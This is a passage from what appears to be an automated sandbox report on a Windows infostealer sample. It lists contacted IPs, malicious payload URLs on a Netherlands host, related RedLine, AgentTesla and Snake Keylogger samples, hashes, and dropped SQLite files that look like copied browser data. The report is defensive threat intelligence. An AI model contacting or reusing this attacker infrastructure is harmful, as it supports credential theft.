                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingPalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://duckduckgo.com/chrome_newtabv20PalEak0Yh6.exe, 00000004.00000002.1367759997.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, tmpDC4F.tmp.4.dr, tmpA510.tmp.4.dr, tmp6D31.tmp.4.dr, tmp6D00.tmp.4.dr, tmpA4EF.tmp.4.dr, tmpA521.tmp.4.dr, tmpA4DE.tmp.4.dr, tmpA520.tmp.4.dr, tmpA4FF.tmp.4.dr, tmpA4CD.tmp.4.dr, tmpA4CC.tmp.4.dr, tmp6D11.tmp.4.drfalse
                                                                                                                      		high
                                                                                                                      http://tempuri.org/Endpoint/GetUpdatesResponsePalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.jiyu-kobo.co.jp/PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Endpoint/EnvironmentSettingsResponsePalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.fontbureau.com/designers8PalEak0Yh6.exe, 00000000.00000002.1216221515.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp6D11.tmp.4.drfalse
                                                                                                                                		high
                                                                                                                                https://gemini.google.com/app?q=tmp6D11.tmp.4.drfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/soap/actor/nextPalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    172.67.75.172
                                                                                                                                    		api.ip.sb.cdn.cloudflare.netUnited States
                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                    45.137.22.163
                                                                                                                                    		unknownNetherlands
                                                                                                                                    		51447ROOTLAYERNETNLtrue

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                    Analysis ID:1632466
                                                                                                                                    Start date and time:2025-03-08 00:45:16 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 7m 18s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:13
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:PalEak0Yh6.exe
                                                                                                                                    renamed because original name is a hash value
                                                                                                                                    Original Sample Name:c69b2b190f08dc6bb255a2c0ce1c148b.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@8/43@1/2
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 53
                                                                                                                                    • Number of non-executed functions: 12
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                    Warnings

                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.60.203.209
                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    18:46:16API Interceptor51x Sleep call for process: PalEak0Yh6.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    172.67.75.172file.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                    • ip.sb/
                                                                                                                                    45.137.22.163invoices---DEC_2023.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                    • 45.137.22.163/Wowoqku.wav
                                                                                                                                    Sysiq.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                    • 45.137.22.163/Sluhmuv.mp3
                                                                                                                                    NEW_ORDER_12-18-23.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                    • 45.137.22.163/Akoob.pdf
                                                                                                                                    SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                    • 45.137.22.163/hiii.pdf
                                                                                                                                    Controllo saldo 30% Ordine 5667.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 45.137.22.163/bless_Jkvszuhw.png
                                                                                                                                    Quotation-pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 45.137.22.163/Toscgshw_Yvmodcuo.png
                                                                                                                                    #Uc8fc#Ubb38 30% #Uc794#Uc561 #Ud655#Uc778.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 45.137.22.163/orderfile_Hecqxfqw.png
                                                                                                                                    New order _xls.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 45.137.22.163/New_order__xls_Ivuuoipf.bmp
                                                                                                                                    SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 45.137.22.163/fact_Sptqaevl.bmp
                                                                                                                                    order confirmation 46574 -QT-04-0022.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 45.137.22.163/order_confirmation_46574_-QT-04-0022_Yszciyqc.jpg

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    api.ip.sb.cdn.cloudflare.netZ6ojPnRBp1.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 104.26.13.31
                                                                                                                                    UVFpX7iieV.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 104.26.12.31
                                                                                                                                    MG9rMQUxSR.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 104.26.13.31
                                                                                                                                    VAORjpyWdv.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 104.26.13.31
                                                                                                                                    mF6d952oso.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 104.26.13.31
                                                                                                                                    yGu4YUwMl6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 104.26.12.31
                                                                                                                                    824-1824-0x0000000000620000-0x0000000000A98000-memory.dmp.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    3612-1418-0x00000000009F0000-0x0000000000E68000-memory.dmp.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 104.26.12.31
                                                                                                                                    Implosions.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 104.26.13.31

                                                                                                                                    ASNs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    CLOUDFLARENETUShttp://signaturerequestdocumentsmarch.sombrainfinita.de/uN7hnGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.112.1
                                                                                                                                    https://eztxt.net/Iv7CmP#bW9uaWNhX2NvbGJhdGhAZmQub3JnGet hashmaliciousUnknownBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    RFQ_PO_98473009.png.exeGet hashmaliciousMSIL Logger, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.64.1
                                                                                                                                    f38186770bffa4a12a7170942b9c0d71ac736142924da24a.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                    • 172.67.186.134
                                                                                                                                    1YDqrpKZwA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 104.21.48.1
                                                                                                                                    l5Cp6aAf3o.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    x4l3iVpFSc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 104.26.13.205
                                                                                                                                    yloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    mCqTwcbnfm.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                    • 104.21.16.1
                                                                                                                                    n8l3NmC5EH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.96.1
                                                                                                                                    ROOTLAYERNETNLZ6ojPnRBp1.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 45.137.22.249
                                                                                                                                    UVFpX7iieV.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 45.137.22.247
                                                                                                                                    MG9rMQUxSR.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 45.137.22.247
                                                                                                                                    VAORjpyWdv.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 185.222.58.250
                                                                                                                                    yGu4YUwMl6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 185.222.58.44
                                                                                                                                    NWzeEUBQ7F.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 45.137.22.234
                                                                                                                                    A18OkaGxHz.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 45.137.22.234
                                                                                                                                    Uv4EriqDCj.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 185.222.58.36
                                                                                                                                    nePPsHIZ1m.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 45.137.22.165
                                                                                                                                    3WSFIhTu1M.exeGet hashmaliciousRedLineBrowse
                                                                                                                                    • 185.222.58.254

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adRFQ_PO_98473009.png.exeGet hashmaliciousMSIL Logger, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    mCqTwcbnfm.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    n8l3NmC5EH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    DbAAqJQFmx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    OW1i3n5K3s.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    XFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 172.67.75.172
                                                                                                                                    sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                    • 172.67.75.172

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PalEak0Yh6.exe.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1216
                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                                                                    MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                                                                    SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                                                                    SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                                                                    SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                                                                    Malicious:true
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp1377.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp1387.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp1398.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp13B8.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp13C9.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp13DA.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp34B4.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):40960
                                                                                                                                    Entropy (8bit):0.8616778647394084
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
                                                                                                                                    MD5:BDDE4AD11E732420E7ABCCA946B11611
                                                                                                                                    SHA1:278C3386A37BAFCA507CF4C128600B01B312DDA0
                                                                                                                                    SHA-256:099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
                                                                                                                                    SHA-512:B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp4A3C.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp4A4D.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp4A5E.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp4A7E.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):98304
                                                                                                                                    Entropy (8bit):0.08235737944063153
